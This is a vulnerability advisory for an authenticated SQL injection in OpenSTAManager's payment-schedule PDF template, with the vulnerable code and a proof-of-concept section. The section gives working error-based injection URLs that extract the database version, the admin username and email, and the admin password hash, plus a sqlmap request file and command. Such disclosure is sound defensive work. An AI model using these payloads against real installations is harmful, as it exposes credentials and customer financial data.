PT-2026-6866 · Packagist · Devcode-It/Openstamanager
Published
2026-02-06
·
Updated
2026-02-06
CVSS v4.0
8.7
High
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
Summary
An authenticated SQL Injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques.
Details
The vulnerability exists in
templates/scadenzario/init.php at line 46, where the id anagrafica parameter is directly concatenated into an SQL query without proper sanitization:Vulnerable Code:
if (get('id anagrafica') && get('id anagrafica') != 'null') {
$module query = str replace('1=1', '1=1 AND `co scadenziario`.`idanagrafica`="'.get('id anagrafica').'"', $module query);
$id anagrafica = get('id anagrafica');
}The
get() function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's prepare() sanitization function, enabling SQL Injection attacks.Root Cause:
- Missing use of
prepare()function for input sanitization - Direct string concatenation in SQL query construction
- No input validation or type checking
Affected Endpoint:
/pdfgen.php?ptype=scadenzario&id anagrafica=[INJECTION PAYLOAD]Affected Files:
templates/scadenzario/init.php(line 46) - Primary vulnerabilitytemplates/scadenzario/init.php(lines 34, 40) - Similar pattern with date parameterspdfgen.php- Entry point for template rendering
PoC (Proof of Concept)
Prerequisites
- Valid authenticated session (any user role)
Exploitation Steps
1. Confirm Vulnerability - Basic Syntax Error Test:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id anagrafica=1%22%20--%20SQL syntax error displayed in application response
2. Extract Database Version - Error-Based SQLi:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221Result:
~8.3.0~ (MySQL version)3. Extract Database Name:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221Result:
~openstamanager~4. Extract Admin Username:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz users%20LIMIT%201),0x7e))%20AND%20%221%22=%221Result: 
~admin~
5. Extract Admin Email:
http://localhost:8081/pdfgen.php?ptype=scadenzario&id anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz users%20LIMIT%201),0x7e))%20AND%20%221%22=%221Result: Admin email address
6. Extract Password Hash (Partial - XPATH 31 char limit):
http://localhost:8081/pdfgen.php?ptype=scadenzario&id anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz users%20LIMIT%201),0x7e))%20AND%20%221%22=%221Result: bcrypt password hash
7. Automated Exploitation with SQLMap:
Create request file
sqli osm.req:GET /pdfgen.php?ptype=scadenzario&id anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION COOKIE]
User-Agent: Mozilla/5.0Run SQLMap:
sqlmap -r sqli osm.req --level 3 --risk 3 --dbsSQLMap Confirmed Injection Types:
- ✅ Boolean-based blind SQL injection
- ✅ Error-based SQL injection (MySQL >= 5.6 GTID SUBSET)
- ✅ Time-based blind SQL injection (SLEEP)
Impact
Who is Impacted:
- ✅ All authenticated users - Any user with valid credentials can exploit this vulnerability
- ✅ Low-privilege users - Even users with minimal permissions can access admin-level data
- ✅ All OpenSTAManager installations - Vulnerability exists in the latest master branch
Attribution
Reported by Łukasz Rybak
Fix
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Devcode-It/Openstamanager